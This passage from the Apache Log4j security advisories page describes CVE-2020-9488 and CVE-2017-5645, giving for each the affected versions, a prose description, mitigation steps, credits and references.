<td class="tableblock halign-left valign-top"><p class="tableblock"><code>[2.0-beta1, 2.12.3) ∪ [2.13.1, 2.13.2)</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions fixed</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>2.12.3</code> (Java 7) and <code>2.13.2</code> (Java 8 and later)</p></td>
</tr>
</tbody>
</table>
<div class="sect3">
<h4 id="CVE-2020-9488-description">Description</h4>
<div class="paragraph">
<p>Improper validation of certificate with host mismatch in SMTP appender.
This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log
messages sent through that appender.</p>
</div>
<div class="paragraph">
<p>The reported issue was caused by an error in <code>SslConfiguration</code>.
Any element using <code>SslConfiguration</code> in the Log4j <code>Configuration</code> is also affected by this issue.
This includes <code>HttpAppender</code>, <code>SocketAppender</code>, and <code>SyslogAppender</code>.
Usages of <code>SslConfiguration</code> that are configured via system properties are not affected.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2020-9488-mitigation">Mitigation</h4>
<div class="paragraph">
<p>Upgrade to <code>2.12.3</code> (Java 7) or <code>2.13.2</code> (Java 8 and later).</p>
</div>
<div class="paragraph">
<p>Alternatively, users can set the <code>mail.smtp.ssl.checkserveridentity</code> system property to <code>true</code> to enable SMTPS hostname verification for all SMTPS mail sessions.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2020-9488-credits">Credits</h4>
<div class="paragraph">
<p>This issue was discovered by Peter Stöckli.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2020-9488-references">References</h4>
<div class="ulist">
<ul>
<li>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-9488">CVE-2020-9488</a></p>
</li>
<li>
<p><a href="https://issues.apache.org/jira/browse/LOG4J2-2819">LOG4J2-2819</a></p>
</li>
</ul>
</div>
</div>
</div>
<div class="sect2">
<h3 id="CVE-2017-5645"><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5645">CVE-2017-5645</a></h3>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 16.6666%;"/>
<col style="width: 83.3334%;"/>
</colgroup>
<tbody>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Summary</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">TCP/UDP socket servers can be exploited to execute arbitrary code</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">CVSS 2.0 Score &amp; Vector</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Components affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>log4j-core</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>[2.0-alpha1, 2.8.2)</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions fixed</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>2.8.2</code> (Java 7)</p></td>
</tr>
</tbody>
</table>
<div class="sect3">
<h4 id="CVE-2017-5645-description">Description</h4>
<div class="paragraph">
<p>When using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2017-5645-mitigation">Mitigation</h4>
<div class="paragraph">
<p>Java 7 and above users should migrate to version <code>2.8.2</code> or avoid using the socket server classes.
Java 6 users should avoid using the TCP or UDP socket server classes, or they can manually backport <a href="https://github.com/apache/logging-log4j2/commit/5dcc192">the security fix commit</a> from <code>2.8.2</code>.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2017-5645-credits">Credits</h4>
<div class="paragraph">
<p>This issue was discovered by Marcio Almeida de Macedo of Red Team at Telstra.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2017-5645-references">References</h4>
<div class="ulist">
<ul>
<li>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5645">CVE-2017-5645</a></p>
</li>
<li>
<p><a href="https://issues.apache.org/jira/browse/LOG4J2-1863">LOG4J2-1863</a></p>
</li>
<li>
<p><a href="https://github.com/apache/logging-log4j2/commit/5dcc192">Security fix commit</a></p>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</main>
</div>
</div>
<hr/>
<footer>
<div class="container-fluid">
<div class="row-fluid">
<p align="center">Copyright &copy; 1999-2024 <a class="external" href="https://www.apache.org">The Apache Software Foundation</a>. All Rights Reserved.<br>
Apache Logging, Apache Log4j, Log4j, Apache, the Apache feather logo, and the Apache Logging project logo are trademarks of The Apache Software Foundation.</p>
</div>
</div>
</footer>
<script>
if(anchors) {
anchors.add();
}
</script>
</body>
</html>